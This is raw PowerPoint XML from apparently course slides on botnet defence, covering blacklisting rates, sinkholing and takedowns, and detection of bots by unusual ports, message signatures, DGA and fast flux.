                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Fraction Blacklisted</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="12595286"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>2 hours</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>29.6%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3109869713"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>3 hours</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>46.4%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4137761421"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>6 hours</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>75.3%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1741277700"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>18 hours</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>90%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="520563187"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31123648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0EC9CE3-9D83-43AC-BD2D-A16F80B7AB55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024128" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Stopping Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B44AE7F8-4D51-48ED-A121-7BEDD73F44C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Takedown time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">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09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F072-9E77-4E3F-8FF9-C1EEE0D2B037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stopping Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745CAA94-060E-4CA2-ACBA-D3AD481FB95F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Individual perspective: ridding your network of bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anti-virus and anti-malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intrusion and anomaly detection to identify infections, block traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global perspective: takedowns and arrests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sinkhole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(fake C&amp;C server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Track down and arrest the perpetrators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21012969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5D97FA9-5CDF-480D-BA5A-C09648D1C808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045882" y="2843772"/>
            <a:ext cx="9701966" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150"/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511A3F2E-865B-442C-A780-A9932091B540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classic Detection of Bots</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Cloud 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A264E56A-E1E3-469C-9E83-E175DE1284F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5896865" y="2180990"/>
            <a:ext cx="1936743" cy="132556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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43A9210C-A4F4-4E7F-B43A-652BA377FE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9619628" y="2251844"/>
            <a:ext cx="2524347" cy="1129621"/>
            <a:chOff x="1291980" y="3951992"/>
            <a:chExt cx="2524347" cy="1129621"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B34F65B5-41C1-403E-966E-0D76A6615B7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2420200" y="4074410"/>
              <a:ext cx="1396127" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>C&amp;C Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 3" descr="D:\Classes\CS 4700\assets\server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077C41C4-C9DE-46F6-9C36-CC4E3E1B9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530" y="3951992"/>
              <a:ext cx="1075834" cy="10758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Classes\CS 4700\assets\devil-icon.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DBDB0E8-D0F7-41ED-8D64-90387CB88D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1980" y="4250616"/>
              <a:ext cx="830997" cy="83099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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35822844-04A0-4771-9C67-7327C4225D56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615953" y="4115101"/>
            <a:ext cx="5264641" cy="2216336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defeated by using standard ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP(S) ports 80/443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defeated by encryption </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F180E1DE-52C3-42B4-98C1-38F74C746569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2078930" y="4092584"/>
            <a:ext cx="4320988" cy="2216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Unusual ports or protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IRC port 6667</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Message signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=spam; target=…”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Multiplication Sign 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8235C7B9-E4F4-4D10-9B33-28947A64256D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666461" y="3831147"/>
            <a:ext cx="952137" cy="952137"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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Multiplication Sign 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6179411B-5BA9-44C6-8CB3-6E8309C11463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666460" y="4747200"/>
            <a:ext cx="952137" cy="952137"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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6" name="Connector: Curved 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D9F318D-02A3-4D6B-8DC1-CE3F05D97EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1243007" y="2821485"/>
            <a:ext cx="8277511" cy="22287"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="76200">
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84D0ACC-1293-4B31-98D3-C20B54DDDA45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2851785" y="1746443"/>
            <a:ext cx="1396127" cy="1732994"/>
            <a:chOff x="5775638" y="3240561"/>
            <a:chExt cx="1396127" cy="1732994"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D715D0F0-849C-4ED0-BB56-8B7FF83A5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3226" y="3702226"/>
              <a:ext cx="1328539" cy="1271329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A1AD27D-943E-42EC-B1BA-182BF2A1D02B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5775638" y="3240561"/>
              <a:ext cx="1396127" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>NIDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8493EA-461E-40CB-A13D-75107C51AD71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="150244" y="2336554"/>
            <a:ext cx="1340841" cy="1075833"/>
            <a:chOff x="10673976" y="3951992"/>
            <a:chExt cx="1340841" cy="1075833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 2" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A090FBDC-F522-4CAC-8610-04DB3943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8984" y="3951992"/>
              <a:ext cx="1075833" cy="10758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6FBCE55-66FB-463E-9F51-4BEF486246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3976" y="4350974"/>
              <a:ext cx="614399" cy="614399"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24011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fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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0">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0">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37"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20">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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xEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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1" grpId="0"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="2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5D97FA9-5CDF-480D-BA5A-C09648D1C808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045882" y="2843772"/>
            <a:ext cx="4613836" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150"/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511A3F2E-865B-442C-A780-A9932091B540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection of DGA and Fast Flux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Cloud 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A264E56A-E1E3-469C-9E83-E175DE1284F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4767312" y="2180990"/>
            <a:ext cx="1936743" cy="132556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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43A9210C-A4F4-4E7F-B43A-652BA377FE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9667653" y="1211222"/>
            <a:ext cx="2524347" cy="1129621"/>
            <a:chOff x="1291980" y="3951992"/>
            <a:chExt cx="2524347" cy="1129621"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
